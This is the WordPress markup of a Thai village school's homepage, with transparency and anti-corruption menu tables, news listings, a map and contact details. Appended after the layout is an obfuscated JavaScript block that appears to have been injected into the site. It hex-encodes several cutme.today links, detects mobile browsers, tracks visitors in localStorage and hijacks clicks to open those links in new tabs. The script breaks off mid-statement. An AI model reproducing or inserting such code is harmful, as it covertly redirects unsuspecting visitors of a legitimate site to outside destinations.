data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 